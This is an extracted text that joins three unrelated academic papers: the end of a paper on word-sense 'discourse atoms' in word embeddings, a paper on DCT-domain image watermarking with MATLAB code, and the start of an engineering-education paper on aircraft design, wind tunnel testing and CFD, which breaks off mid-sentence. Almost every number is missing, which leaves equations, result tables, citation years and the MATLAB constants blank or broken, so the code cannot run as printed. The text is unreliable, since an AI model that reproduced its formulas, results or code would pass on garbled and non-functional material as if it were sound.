what discourses are not being used. we think semantically meaningless atoms —i.e., unex- plained inner products—exist because a simple language model such as ours cannot explain all observed co-occurrences due to grammar, stopwords, etc. it ends up needing smoothing terms. atom drowning instagram stakes membrane slapping orchestra conferences suicides twitter thoroughbred mitochondria pulling philharmonic meetings overdose facebook guineas cytosol plucking philharmonia seminars murder tumblr preakness cytoplasm squeezing conductor workshops poisoning vimeo filly membranes twisting symphony exhibitions commits linkedin fillies organelles bowing orchestras organizes stabbing reddit epsom endoplasmic slamming toscanini concerts strangulation myspace racecourse proteins tossing concertgebouw lectures gunshot tweets sired vesicles grabbing solti presentations table : some discourse atoms and their nearest words. by equation ( ), words most likely to appear in a discourse are those nearest to it. tie spring trousers season scoreline wires operatic beginning dampers flower creek humid blouse teams goalless cables soprano until brakes flowers brook winters waistcoat winning equaliser wiring mezzo months suspension flowering river summers skirt league clinching electrical contralto earlier absorbers fragrant fork ppen sleeved finished scoreless wire baritone year wheels lilies piney warm pants championship replay cable coloratura last damper flowered elk temperatures table : five discourse atoms linked to the words tie and spring. each atom is represented by its nearest words. the algorithm often makes a mistake in the last atom (or two), as happened here. relationship to topic models. atoms of discourse may be reminiscent of results from other automated methods for obtaining a thematic understanding of text, such as topic modeling, described in the sur- vey by blei ( ). this is not surprising since the model ( ) used to compute the embeddings is re- lated to a log-linear topic model by mnih and hinton ( ). however, the discourses here are computed via sparse coding on word embeddings, which can be seen as a linear algebraic alternative, resulting in fairly fine-grained topics. atoms are also reminis- cent of coherent “word clusters” detected in the past using brown clustering, or even sparse coding (mur- phy et al., ). the novelty in this paper is a clear interpretation of the sparse coding results as atoms of discourse, as well as its use to capture different word senses. testing wsi in applications while the main result of the paper is to reveal the linear algebraic structure of word senses within ex- isting embeddings, it is desirable to verify that this view can yield results competitive with earlier sense embedding approaches. we report some tests be- low. we find that common word embeddings per- form similarly with our method; for concreteness we use induced embeddings described in section . . they are evaluated in three tasks: word sense induc- tion task in semeval (manandhar et al., ), word similarity in context (huang et al., ), and a new task we called police lineup test. the results are compared to those of existing embedding based approaches reported in related work (huang et al., ; neelakantan et al., ; mu et al., ). . word sense induction in the wsi task in semeval , the algorithm is given a polysemous word and about pieces of texts, each using it according to a single sense. the algorithm has to cluster the pieces of text so that those with the same sense are in the same cluster. the evaluation criteria are f-score (artiles et al., ) and v-measure (rosenberg and hirschberg, ). the f-score tends to be higher with a smaller number of clusters and the v-measure tends to be higher with a larger number of clusters, and fair eval- uation requires reporting both. given a word and its example texts, our algorithm uses a bayesian analysis dictated by our theory to compute a vector uc for each piece of text c and and then applies k-means on these vectors, with the small twist that sense vectors are assigned to near- est centers based on inner products rather than eu- clidean distances. table shows the results. computing vector uc. for word w we start by com- puting its expansion in terms of atoms of discourse (see ( ) in section ). in an ideal world the nonzero coefficients would exactly capture its senses, and each text containing w would match to one of these nonzero coefficients. in the real world such deter- ministic success is elusive and one must reason us- ing bayes’ rule. for each atom a, word w and text c there is a joint distribution p(w, a, c) describing the event that atom a is the sense being used when word w was used in text c. we are interested in the posterior distribution: p(a|c, w) ∝ p(a|w)p(a|c)/p(a). ( ) we approximate p(a|w) using theorem , which suggests that the coefficients in the expansion of vw with respect to atoms of discourse scale according to probabilities of usage. (this assertion involves ig- noring the low-order terms involving the logarithm in the theorem statement.) also, by the random walk model, p(a|c) can be approximated by exp(⟨va, vc⟩) where vc is the sif embedding of the context. fi- nally, since p(a) = ec[p(a|c)], it can be empirically estimated by randomly sampling c. the posterior p(a|c, w) can be seen as a soft de- coding of text c to atom a. if texts c , c both contain w, and they were hard decoded to atoms a , a re- spectively then their similarity would be ⟨va , va ⟩. with our soft decoding, the similarity can be defined by taking the expectation over the full posterior: similarity(c , c ) = eai∼p(a|ci,w),i∈{ , }⟨va , va ⟩, ( ) = ⟨ ∑ a p(a |c , w)va , ∑ a p(a |c , w)va ⟩ . at a high level this is analogous to the bayesian polysemy model of reisinger and mooney ( ) and brody and lapata ( ), except that they in- troduced separate embeddings for each sense clus- ter, while here we are working with structure already existing inside word embeddings. method v-measure f-score (huang et al., ) . . (neelakantan et al., ) . . (mu et al., ), k = . . (mu et al., ), k = . . ours, k = . . ours, k = . . ours, k = . . ours, k = . . table : performance of different vectors in the wsi task of semeval . the parameter k is the num- ber of clusters used in the methods. rows are di- vided into two blocks, the first of which shows the results of the competitors, and the second shows those of our algorithm. best results in each block are in boldface. the last equation suggests defining the vector uc for the text c as uc = ∑ a p(a|c, w)va, ( ) which allows the similarity between two text pieces to be expressed via the inner product of their vectors. results. the results are reported in table . our approach outperforms the results by huang et al. ( ) and neelakantan et al. ( ). when com- pared to mu et al. ( ), for the case with centers, we achieved better v-measure but lower f-score, while for centers, we achieved lower v-measure but better f-score. . word similarity in context the dataset consists of around pairs of words, along with the contexts the words occur in and the ground-truth similarity scores. the evaluation cri- terion is the correlation between the ground-truth scores and the predicted ones. our method computes the estimated sense vectors and then the similarity as in section . . we compare to the baselines that sim- ply use the cosine similarity of the glove/skip-gram vectors, and also to the results of several existing sense embedding methods. results. table shows that our result is better than those of the baselines and mu et al. ( ), but slightly worse than that of huang et al. ( ). method spearman coefficient glove . skip-gram . (huang et al., ) . (neelakantan et al., ) . (mu et al., ) . ours . table : the results for different methods in the task of word similarity in context. the best result is in boldface. our result is close to the best. note that huang et al. ( ) retrained the vectors for the senses on the corpus, while our method de- pends only on senses extracted from the off-the-shelf vectors. after all, our goal is to show word senses already reside within off-the-shelf word vectors. . police lineup evaluating wsi systems can run into well-known difficulties, as reflected in the changing metrics over the years (navigli and vannella, ). inspired by word-intrusion tests for topic coherence (chang et al., ), we proposed a new simple test, which has the advantages of being easy to understand, and ca- pable of being administered to humans. the testbed uses polysemous words and their senses according to wordnet. each sense is represented by related words, which were col- lected from wordnet and online dictionaries by col- lege students, who were told to identify most rele- vant other words occurring in the online definitions of this word sense as well as in the accompany- ing illustrative sentences. these are considered as ground truth representation of the word sense. these words are typically not synonyms. for example, for the tool/weapon sense of axe they were “handle, harvest, cutting, split, tool, wood, battle, chop.” the quantitative test is called police lineup. first, randomly pick one of these polysemous words. second, pick the true senses for the word and then add randomly picked senses from other words so that there are n senses in total, where each sense is represented by related words as mentioned. fi- nally, the algorithm (or human) is given the polyse- mous word and a set of n senses, and has to identify the true senses in this set. table gives an example. word senses bat navigate nocturnal mouse wing cave sonic fly dark used hitting ball game match cricket play baseball wink briefly shut eyes wink bate quickly action whereby legal court law lawyer suit bill judge loose ends two loops shoelaces tie rope string horny projecting bird oral nest horn hard food table : an example of the police lineup test with n = . the algorithm (or human subject) is given the polysemous word “bat” and n = senses each of which is represented as a list of words, and is asked to identify the true senses belonging to “bat” (high- lighted in boldface for demonstration). algorithm our method for the police lineup test input: word w, list s of senses (each has words) output: t senses out of s : heuristically find inflectional forms of w. : find atoms for w and each inflectional form. let u denote the union of all these atoms. : initialize the set of candidate senses cw ← ∅, and the score for each sense l to score(l) ←−∞ : for each atom a ∈ u do : rank senses l ∈ s by score(a, l) = s(a, l)−sla + s(w, l) − slv : add the two senses l with highest score(a, l) to cw, and update their scores score(l) ← max{score(l), score(a, l)} : return the t senses l ∈ cs with highest score(l) our method (algorithm ) uses the similarities between any word (or atom) x and a set of words y , defined as s(x, y ) = ⟨vx, vy ⟩ where vy is the sif embedding of y . it also uses the average simi- larities: sya = ∑ a∈a s(a, y ) |a| , s y v = ∑ w∈v s(w, y ) |v | where a are all the atoms, and v are all the words. we note two important practical details. first, while we have been using atoms of discourse as a proxy for word sense, these are too coarse-grained: the to- tal number of senses (e.g., wordnet synsets) is far greater than . thus the score(·) function uses both the atom and the word vector. second, some words are more popular than the others—i.e., have large components along many atoms and words— which seems to be an instance of the smoothing . . . . recall . . . . p re c is io n our method mu et al, word vec native speaker non-native speaker number of meanings m . . . . recall precision a b figure : precision and recall in the police lineup test. (a) for each polysemous word, a set of n = senses containing the ground truth senses of the word are presented. human subjects are told that on average each word has . senses and were asked to choose the senses they thought were true. the algorithms select t senses for t = , , . . . , . for each t, each algorithm was run times (standard deviations over the runs are too small to plot). (b) the performance of our method for t = and n = , , . . . , . phenomenon alluded to in footnote . the penalty terms sla and s l v lower the scores of senses l con- taining such words. finally, our algorithm returns t senses where t can be varied. results. the precision and recall for different n and t (number of senses the algorithm returns) are pre- sented in figure . our algorithm outperforms the two selected competitors. for n = and t = , our algorithm succeeds with precision % and re- call %, and performance remains reasonable for n = . giving the same test to humans for n = (see the left figure) suggests that our method per- forms similarly to non-native speakers. other word embeddings can also be used in the test and achieved slightly lower performance. for n = and t = , the precision/recall are lower by the following amounts: glove . %/ . %, nnse (matrix factorization on pmi to rank by murphy et al. ( )) %/ %. conclusions different senses of polysemous words have been shown to lie in linear superposition inside standard word embeddings like word vec and glove. this has also been shown theoretically building upon human subjects are graduate students from science or engi- neering majors at major u.s. universities. non-native speakers have to years of english language use/learning. previous generative models, and empirical tests of this theory were presented. a priori, one imagines that showing such theoretical results about the in- ner structure of modern word embeddings would be hopeless since they are solutions to complicated nonconvex optimization. a new wsi method is also proposed based upon these insights that uses only the word embeddings and sparse coding, and shown to provide very com- petitive performance on some wsi benchmarks. one novel aspect of our approach is that the word senses are interrelated using one of about dis- course vectors that give a succinct description of which other words appear in the neighborhood with that sense. our method based on sparse coding can be seen as a linear algebraic analog of the cluster- ing approaches, and also gives fine-grained thematic structure reminiscent of topic models. a novel police lineup test was also proposed for testing such wsi methods, where the algorithm is given a word w and word clusters, some of which belong to senses of w and the others are distractors belonging to senses of other words. the algorithm has to identify the ones belonging to w. we con- jecture this police lineup test with distractors will challenge some existing wsi methods, whereas our method was found to achieve performance similar to non-native speakers. acknowledgements we thank the reviewers and the action editor of tacl for helpful feedback and thank the editors for granting special relaxation of the page limit for our paper. this work was supported in part by nsf grants ccf- , dms- , simons in- vestigator award, simons collaboration grant, and onr-n - - - . tengyu ma was addition- ally supported by the simons award in theoretical computer science and by the ibm ph.d. fellow- ship. references sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, and andrej risteski. . a latent variable model approach to pmi-based word embeddings. trans- action of association for computational linguistics, pages – . sanjeev arora, yingyu liang, and tengyu ma. . a simple but tough-to-beat baseline for sentence embed- dings. in in proceedings of international conference on learning representations. javier artiles, enrique amigó, and julio gonzalo. . the role of named entities in web people search. in proceedings of the conference on empirical methods in natural language processing, pages – . yoshua bengio, réjean ducharme, pascal vincent, and christian jauvin. . a neural probabilistic lan- guage model. journal of machine learning research, pages – . david m. blei. . probabilistic topic models. com- munication of the association for computing machin- ery, pages – . samuel brody and mirella lapata. . bayesian word sense induction. in proceedings of the th confer- ence of the european chapter of the association for computational linguistics, pages – . jonathan chang, sean gerrish, chong wang, jordan l. boyd-graber, and david m. blei. . reading tea leaves: how humans interpret topic models. in advances in neural information processing systems, pages – . kenneth ward church and patrick hanks. . word association norms, mutual information, and lexicogra- phy. computational linguistics, pages – . ivan damnjanovic, matthew davies, and mark plumb- ley. . smallbox – an evaluation framework for sparse representations and dictionary learning al- gorithms. in international conference on latent vari- able analysis and signal separation, pages – . antonio di marco and roberto navigli. . clus- tering and diversifying web search results with graph- based word sense induction. computational linguis- tics, pages – . manaal faruqui, yulia tsvetkov, dani yogatama, chris dyer, and noah a. smith. . sparse overcomplete word vector representations. in proceedings of as- sociation for computational linguistics, pages – . christiane fellbaum. . wordnet: an electronic lexical database. mit press. john rupert firth. . a synopsis of linguistic theory, - . studies in linguistic analysis. alex gittens, dimitris achlioptas, and michael w ma- honey. . skip-gram – zipf + uniform = vector additivity. in proceedings of the th annual meet- ing of the association for computational linguistics (volume : long papers), volume , pages – . thomas l. griffiths, mark steyvers, and joshua b. tenenbaum. . topics in semantic representation. psychological review, pages – . eric h. huang, richard socher, christopher d. manning, and andrew y. ng. . improving word representa- tions via global context and multiple word prototypes. in proceedings of the th annual meeting of the asso- ciation for computational linguistics, pages – . ignacio iacobacci, mohammad taher pilehvar, and roberto navigli. . sensembed: learning sense embeddings for word and relational similarity. in pro- ceedings of association for computational linguis- tics, pages – . omer levy and yoav goldberg. . neural word embedding as implicit matrix factorization. in ad- vances in neural information processing systems, pages – . suresh manandhar, ioannis p klapaftis, dmitriy dligach, and sameer s pradhan. . semeval : task : word sense induction & disambiguation. in pro- ceedings of the th international workshop on seman- tic evaluation, pages – . tomas mikolov, ilya sutskever, kai chen, greg s. cor- rado, and jeff dean. a. distributed represen- tations of words and phrases and their composition- ality. in advances in neural information processing systems, pages – . tomas mikolov, wen-tau yih, and geoffrey zweig. b. linguistic regularities in continuous space word representations. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – . andriy mnih and geoffrey hinton. . three new graphical models for statistical language modelling. in proceedings of the th international conference on machine learning, pages – . jiaqi mu, suma bhat, and pramod viswanath. . ge- ometry of polysemy. in proceedings of international conference on learning representations. brian murphy, partha pratim talukdar, and tom m. mitchell. . learning effective and interpretable semantic models using non-negative sparse embed- ding. in proceedings of the th international confer- ence on computational linguistics, pages – . roberto navigli and daniele vannella. . semeval : task : word sense induction and disambigua- tion within an end-user application. in second joint conference on lexical and computational semantics, pages – . arvind neelakantan, jeevan shankar, re passos, and andrew mccallum. . efficient nonparametric estimation of multiple embeddings per word in vec- tor space. in proceedings of conference on empiri- cal methods in natural language processing, pages – . bruno olshausen and david field. . sparse coding with an overcomplete basis set: a strategy employed by v ? vision research, pages – . jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word rep- resentation. in proceedings of the empiricial methods in natural language processing, pages – . joseph reisinger and raymond mooney. . multi- prototype vector-space models of word meaning. in proceedings of the conference of the north american chapter of the association for computational linguis- tics: human language technologies, pages – . andrew rosenberg and julia hirschberg. . v- measure: a conditional entropy-based external clus- ter evaluation measure. in conference on empirical methods in natural language processing and confer- ence on computational natural language learning, pages – . hinrich schutze. . automatic word sense discrimi- nation. computational linguistics, pages – . ran tian, naoaki okazaki, and kentaro inui. . the mechanism of additive composition. machine learn- ing, ( ): – . peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of seman- tics. journal of artificial intelligence research, pages – . wikimedia. . english wikipedia dump. accessed march . david yarowsky. . unsupervised word sense dis- ambiguation rivaling supervised methods. in proceed- ings of the rd annual meeting on association for computational linguistics, pages – . international journal of advanced network monitoring and controls volume , no. , a dct domain image watermarking method based on matlab wu he-jing department of computer science & electrical engineering, east university of heilongjiang, harbin, china email: @qq.com abstract. in the text, a method of image watermarking based on dct (discrete cosine transform) domain algorithm is proposed and verified in experiment by matlab. the experimental result shows that the current method can achieve embedding with sound robustness and invisibility. from the experimental results, the quality of the watermarked image is almost no decline relative to the original. keywords: dct, watermarking, matlab, embedding . introduction along with the development of technologies about computer, network, and multimedia, the transmission of multimedia information such as music, image and video becomes more and more convenient, whereas the problem of copyright infringement has brought new opportunity for the effective protection of intellectual property. people invented a technique to hide the company logo, specific digital identifier and other information into the multimedia files for the sake of identification of ownership. such a technique is called digital watermarking, which is a branch in the information hiding technology. the basic requirements are: ) transparency, referring to that a certain amount of digital watermarking information is embedded in a digital media host, with the hidden data being imperceptible and without causing degradation to the original media; )robustness, referring to that the digital watermarking must be immune to the transformation applied on host media such as lossy compression, filtering and cropping, that is, the watermark information should not be lost due to some transformation applied to the host media; )safety, referring to that the digital watermark can resist all kinds of deliberate attack, and it is difficult to be copied or forged by others, as long as they do not know the secret key control algorithm. this paper focuses on a theme on dct-based image digital watermark design and implementation. improve a digital image watermarking algorithm which is based on dct transform and arnold scrambling. it is ensure the security of the watermarking by arnold scrambling the original watermark information. the experimental results show that it is hiding the information of gray image, and make an experimental simulation on some common image attacks. . dct transformation discrete cosine transform is based on orthogonal transform, which is one of the most commonly used linear transform in digital signal processing. it reflects the correlation properties of image signal. dct algorithm is of moderate complexity, with medium energy consumption and has the good ability to energy compression. thus, it is widely used in digital signal compression such as image a dct domain image watermarking method based on matlab compression and other fields. jpeg compression is a standard established on the basis of the dct transform. watermarking algorithm of jpeg compression standard has greatly enhanced the ability to resist jpeg compression based on watermark. so the dct transform in watermark technology is very important. dct transform decompose the image into a spectrum of different spatial frequencies ( ),f u v ,with ( ),u v known as the frequency domain coordinates. the inverse transform puts different spatial frequency components into the original image synthesis. in digital image processing often a two dimensional dct transform is used. for a picture with the dimension m n× , the dct transform is: ( ) ( ) ( , ) ( ) ( ) ( , ) cos cos m n x y x y f u c u c v f x y m n π π ν − − = = + + = ∑ ∑ ( ) ( ) , , , m umc u um  = =   = ⋅⋅⋅ −  ( ) ( ) , , , vnc v v nn  = =   = ⋅⋅⋅ −  ( ) the two dimensional inverse dct transform formula is: n vy m ux vufvcucyxf m u n v ) ( cos ) ( cos),()()(),( ++ = ∑∑ − = − = ππ ( ) among them, x,y are spatial sampling values and u,v are the frequency domain sampling values. because digital image is always measured by pixels, that is, m=n, in such cases, the two-dimensional dct transform and inverse transform can be simplified as: ( ) ( ) ( , ) ( ) ( ) ( , ) cos cos n n x y x y f u c u c v f x y n n π π ν − − = = + + = ∑ ∑ ( ) n vy n ux vufvcucyxf n u n v ) ( cos ) ( cos),()()(),( ++ = ∑∑ − = − = ππ . discrete cosine transform watermarking embedding algorithm digital image watermarking algorithm that select the value of the two gray image as watermark information, choose the best one from different embedding coefficient. the vector image is * block, and the gray level digital watermark value directly embedded into the dct transform domain vector in gray image, which realize the embedded watermarking. specific methods are as follows: let i be the original image with the size of m n× , w is the watermark image with the size of p q× , m and n are even times of p and q, and the watermark w is loaded into the image i. the algorithm is divided into the following steps: international journal of advanced network monitoring and controls volume , no. , ( )i is divided into the block b with the size of ( / ) * ( / )m n , and make a dct transform; ( )by arnold transform, b is divided into the block v with the size of ( / ) * ( / )p m q n , and make a dct transform; ( )watermark is embedded according to the multiplicative watermarking algorithm, which put the block into the carrier image in i, and the idct transform is performing and get a new image with watermark. the program code is as follows: m= ; n= ; k= ; i=zeros(m,m); j=zeros(n,n); block=zeros(k,k); subplot( , , ); i=imread(‘lena.jpg’); i=rgb gray(i); i=imresize(i,[ , ],’bicubic’); imwrite(i,’lena .jpg’,’jpg’); imshow(i); title(‘original image’); subplot( , , ); j=imread(‘heida.jpg’); j=im bw(j, . ); j=imresize(j,[ , ],’bicubic’); imwrite(j,’heida .jpg’,’jpg’); imshow(j); title(‘the original image’); for p= :n for q= :n x=(p- )*k+ ; y=(q- )*k+ ; a dct domain image watermarking method based on matlab block=i(x:x+k- ,y:y+k- ); block=dct (block); if j(p,q)== a=- ; else a= ; end block=block*( +a* . ); block=idct (block); i(x:x+k- ,y:y+k- )=block; end end subplot( , , ); imshow(i); title(‘matermark image’); imwrite(i,’watermarked.jpg’,’jpg’); . discrete cosine transform watermark extraction algorithmin set the image i as the carrier image with embedded watermark. firstly, it need extract the watermark image from i, and the extraction process is the inverse of the embedded watermarking algorithm. ( ) the image i is decomposed into the size of ( / ) * ( / )m n ; ( ) make a dct transform for each block; ( ) make each block watermark extraction process according to the multiplicative inverse algorithm ; ( ) make the idct transform, and a watermark image is synthesized. clear all m= ; n= ; k= ; a=imread(‘lena .jpg’); %i=imread(‘watermarked.jpg’); %i=rgb gray(i); international journal of advanced network monitoring and controls volume , no. , a=imresize(a,[ , ],’bicubic’); b=imread(‘watermarkedr.jpg’); for p= :n for q= :n x=(p- )*k+ ; y=(q- )*k+ ; block =a(x:x+k- ,y:y+k- ); block =b(x:x+k- ,y:y+k- ); block =idct (block ); block =idct (block ); if block ( , )== if block ( , )~= a=(block ( , )/block ( , ))- ; if a< w(p,q)= ; else w(p,q)= ; end end end end subplot( , , ); imshow(w); title(‘the extracted watermark image’); imwrite(w,’w .jpg’,’jpg’); . experimental results and analysis in this paper, the experimental results are obtained based on matlab . simulation. the original image uses the gray image of lena, the watermark image is the two value image containing the words east university of heilongjiang. a dct domain image watermarking method based on matlab (a)the original carrier image (b) two value watermark image (c) the watermarking image after figure. the watermark embedding test results we can see from the experimental results, the quality of the watermarked image is almost no decline relative to the original, almost invisible. respectively, shear attacks、noise attacks、compression attacks are put on the watermarked image, and carries the watermark detection, get the following figure. (a) gray image after shear % (b) % shear watermarked image figure. % experimental results of shear (a) gray image after shear % (b) % shear watermarked image figure. % experimental results of shear international journal of advanced network monitoring and controls volume , no. , (a) gray image after shear % (b) % shear watermarked image figure. % experimental results of shear table normalized different shear ratio similarity coefficient from table , we can see that according to the continuous change of different shear ratio, the extracted watermark image whose normalized similarity coefficient (nc)also showed different changes. according to the data in the above table and the extracted watermark image with different shear ratio, we can see that shearing off a portion of the image, but the relevant information from the original color image watermarking is still extracted. (a)gauss joined the variance of noise image . (b)from the variance of . images extracted watermark figure. adding gauss noise variance for experimental results of . (a)the compression factor of gray image (b)from a factor of images extracted watermark figure. experimental results for gray image compression factor of shear ratio % % % % % % nc . . . . . a dct domain image watermarking method based on matlab table different quality factor compression experimen we conducted various experiments to attack the algorithm, it is concluded that the algorithm can be well applied to copyright protection and authentication. the experiment results prove that the digital watermarking algorithm we used is a good robustness、transparency、low complexity algorithm. in a word,research on the digital watermarking technique is developed in recent years and more active. the research in this area has achieved some results, but the workload is not enough. more research is needed to obtain greater progress in this field. references [ ] hernandez j r, amado m,perez g f.dct domain watermarking techniques for still images:detector performance analysis and a new structure.ieee trans on image processing, , ( ): - . [ ] a . z . t r i k e l , g . a . r a n k i n a n d r . v a n s c h y n d e l . e l e c t r o n i c w a t e r m a r k [ c ] . i n : d i g i t a l i m a g e computing,technology and applications-dicta , macquarie university, : - . [ ] r.g.van schyndel,a.z.tirkel and c.f.osborne.a digital watermark[c]. proceedings of ieee international conference on image processing, , : - . [ ] sun x m, luo g,huang hj.component-based digital watermarking of chinese texts[c].proceedings of the third international conference on information security.shanghai,china, , : - . [ ] p.s.huang,c.s.chiang, c.p.chang.robust spatial watermarking technique for color images via direct saturation adjustment[j]. proceedings of ieee:vision, image and signa processing, , ( ): - . [ ] f.a.p.petitcolas, r.j.anderson and m.g.kuhu.information hiding-a survey[j].proceedings of ieee, , ( ): - . [ ] g.voyatzis and i. pitas. the use of watermarks in the protection of digital multimedia products[j]. proceedings of the ieee, , ( ): - . [ ] nikolaidis n, pitas i.copyright protection of images using robust digital signatures[c].ieee international conference on acoustics, speech,and signal processing.usa, : - . [ ] j . m . a c k e n . h o w w a t e r m a r k i n g a d d s v a l u e t o d i g i t a l c o n t e n t [ j ] . c o m m u n i c a t i o n s o f t h e acm, , ( ): - . quality factor(%) nc . . . . . your paper's title starts here: please center american journal of engineering research (ajer) american journal of engineering research (ajer) e-issn: - p-issn : - volume- , issue- , pp- - www.ajer.org research paper open access w w w . a j e r . o r g page aircraft design analysis, cfd and manufacturing haifa el-sadi* wentworth institute of technology, huntington, boston, ma, usa abstract: aircraft design, manufacturing and cfd analysis as part of aerodynamic course, the students achieve sizing from a conceptual sketch, select the airfoil geometry and the tail geometry, calculate thrust to weight ratio and wing loading, use initial sizing and calculate the aerodynamic forces. the students design their aircraft based on the geometrical dimensions resulted from the calculations and use the model to build a prototype, test it in wind tunnel and achieve cfd analysis to be compared with the experimental results. the theory of aerodynamic is taught and applied as a project based. in this paper, the design process, aircraft manufacturing and cfd analysis are presented to show the effect of project based on student’s learning of aerodynamic course. this project based learning has improved and accelerated students understanding of aerodynamic concepts and involved students in a constructive exploration. the analysis of the aircraft resulted in a study that revolved around the lift and drag generation of this particular aircraft. as to determine the lift and drag forces generated by this plane, a model was created in solidworks a -d model-rendering program. after this model was created it was -d printed in a reduced scale, and subjected to wind tunnel testing. the results from the wind tunnel lab experiment were recorded. for accuracy, the same -d model was then simulated using cfd simulation software within solidworks and compared with the results from the wind tunnel test. the values derived from both the simulation and the wind tunnel tests were then compared with the theoretical calculations for further proof of accuracy. keywords: computational fluid dynamics (cfd), design, aircraft, aerodynamic, wind tunnel i. introduction the conceptual design phases begins a conceptual sketch and aims to determine key design parameters that the final aerodynamics will have to meet. this design will typically include the approximate wing and tail geometries, fuselage shape, and the internal locations of major components such as the engine, cockpit, payload/passenger compartments, landing gears, and fuel tanks. these design requirements are used to estimate the weight of the final aircraft by comparison to previous designs. the takeoff weight is a critical characteristic that will dictate the final size and shape of the airfoil. iterative calculations for this weight are made using assumptions from previous aircraft designs and aerodynamic aiaa table standards [ , , , and ]. the final lift requirements will then determine required airfoil size and shape, with more iterative refinements made between steps. gennarozuppardi shows that an interactive and wholly automatized computer code has been developed on a microcomputer for the aerodynamic analysis of airfoils in incompressible now fields, it is intended to serve as a useful support in teaching aerodynamics. the code contains a number of modules (or blocks) for: ( ) drawing the shape with the help of an interactive graphic device interfaced with the microcomputer; ( ) computing the aerodynamic inviscid and viscous flow field and the aerodynamic coefficients; ( ) modifying and/or correcting the body shape and then computing the new aerodynamic coefficients [ ]. mark drela presents some of his views on teaching fluid dynamics and aerodynamics that the course syllabus stresses physical and mathematical understanding of underlying concepts rather than specialized engineering or computational skills, it is argued that deep understanding is what enables the engineer or researcher to generate truly new ideas and work on out of the ordinary topics and to continue personal learning and development throughout a career [ , ]. the goal of this paper and its research is to show the students the steps of aerodynamic design and perform their own design and compare three types of acquired lift results for their own designed aircraft. following proven aerodynamic formulas and aiaa airfoil charts, assumptions were made to provide a baseline weight from which the iterations were run to refine the final design weight. this finalized weight was then used to calculate the geometry of the wings, fuselage, airfoil, and tail section of the aircraft. this geometry was used to model the complete aircraft in computer aided design software and a : scale model was d printed for wind tunnel testing. the wind tunnel was used to measure lift and drag forces for various angles of attack that http://www.sciencedirect.com/science/article/pii/ american journal of engineering research (ajer) w w w . a j e r . o r g page could then be compared to both the iterative calculations as well as the results calculated through computational fluid dynamics. ii. design analysis methods phase # theoretical calculations the theoretical calculations is a useful method as to further define the usage of the aircraft. these calculations will give an idea of the basic structure to the design team. properties that are highly important to a newly designed aircraft are directly resulted from this stage of design. the design team will use this tool to determine the range and weight limitations of the aircraft. before the modeling phase a type of wing will be selected and further refined in later phases of design. the design weight was calculated by taking the weight of everything that was part of the plane and adding it all together. this was used to initially calculate the weight to be used for the design. the empty weight was calculated in accordance with the woguess weight in order to iterate with the calculated design weight. by using multiple iterations the design weight could be narrowed down to one true value. empty weight fraction the recalculated empty weight fraction was used with the intention of recalculating the design weight. which would be the final weight that would be used in the design. this was necessary for not only recalculating the design weight but also the fuselage. recalculated empty weight fraction the recalculated design weight was taken in order to calculate the final design weight used in the design using the recalculated empty weight fraction. this formula is also used to determine the value of the recalculated fuselage length. recalculated design weight fuselage length fuselage area span american journal of engineering research (ajer) w w w . a j e r . o r g page ar is an aspect ratio which is the ratio of its length to its chord. a low aspect ratio indicates short, stubby wings while a high aspect ratio indicates long narrow wings. this equation is used to determine the true aspect ratio. the length of the wing span is determined using the aspect ratio and is also vital to the geometry and design of the aircraft. it’s determined by taking the square root of the product of the aspect ratio and area of the wing. the wing area is also a vital component to the design of the aircraft, calculated by simply multiplying the wing thickness by the span. wing area the horizontal tail is required in any plane for flight. with the fuselage and wings accounted for the design of the tail is all that is missing. the horizontal tail is determined by multiplying . by the thickness ratio. lift forces contrast with the drag force and is the component of the force of a fluid flowing past the aircraft perpendicular to the oncoming flow direction. the lift and forces were determined at different angles of attack from to degrees. the first priority of testing was to render a three dimensional representation of the proposed design using solidworks. using the calculated dimensions for the fuselage. following the fuselage, the wings needed to be modeled. the airfoil chosen for the aircraft was the naca . using the calculated values for span, chord lengths (root, mean, and tip), mean chord span, one wing was modeled and then mirrored in solidworks for consistency throughout the entire wing span, as shown in table and figure . table . aircraft dimensions american journal of engineering research (ajer) w w w . a j e r . o r g page fig. . solid works model of aircraft phase # wind tunnel laboratory experiment upon completing all parts of the aircraft, they were assembled together to produce the final model of the proposed aircraft (as shown in figure ). this model was scaled down : in order to print it using the uprinter -d printer located in the manufacturing center at wentworth institute of technology. the material that the model was printed with was absplus plastic american journal of engineering research (ajer) w w w . a j e r . o r g page fig. . the d printed model phase # cfd simulation a cfd study in the solidworks program paralleled the experimental wind tunnel analysis. the same conditions were reproduced within the program. the exact same scaled model was also studied. as to ensure accuracy each study was performed independently and uninfluenced by one another. the model created in the solidworks program was then prepared for simulation. the meshing function of the simulation proved to be highly instrumental in attaining accurate results from the cfd. figure shows the contour of the pressure and figure shows the streamlines of air around the aircraft. fig. . the pressure contour of the airplane american journal of engineering research (ajer) w w w . a j e r . o r g page fig. . the streamlines of the air around the airplane the comparison between the experiments and the cfd simulation has been carried out as shown in figures and . at low angle of attack the difference between the experiments and cfd is slightly significant comparing to high angle of attack for both drag and lift forces. parasitic drag in the cfd simulation was not indicative of what we found in the theoretical calculations. further refinement of this model would likely reduce the percent difference observed, although not by much. in contrast, the lift percent error ranged from only to % which is quite good considering the many assumptions made. overall, a trend can still be seen in these two sets of data: a positive correlation between drag and lift as a function of angle of attack. as angle of attack increases, so do both drag and lift. this makes sense because as the plane pitches up more surface area is in contact with the flow, causing more drag. but at the same time, the increased angle of attack on the airfoil creates a greater pressure drop because the air moves faster over the top of the wing, attributing to more lift. this trend carried over to the comparison between the cfd and wind-tunnel tests of the : scale model. teams were made aware that the wind tunnel would not be a very accurate measurement tool. it was not designed to simulate the conditions the project required, nor were the d models perfect representations of the cfd models. despite these truths, percent error for both lift and drag fell between . and % for both the . and . mph wind tunnel trials. given the circumstances, these results were considered successful, as they still provide a valid representation of angle of attack’s effects on both lift and drag on aircraft. in retrospect, more could have been done to reduce the gross percent errors that were experienced during the design process, primarily in testing equipment and procedure, but the concepts applied would remain the same. the three phases of design and assumptions that were made based on the a produced somewhat reasonable lift and drag results for the designed aircraft’s aerodynamics. table shows the comparison of the results of drag and lift forces. american journal of engineering research (ajer) w w w . a j e r . o r g page fig. . comparing drag-experiment and cfd vs. angle of attack fig. . comparing drag-experiment and cfd vs. angle of attack iii. conclusion the three phases of design were critical in following a set design procedure, and using the assumptions to make reasonable estimates for our own model. while these assumptions assisted in moving the design along, they greatly contributed to the errors we would see between our 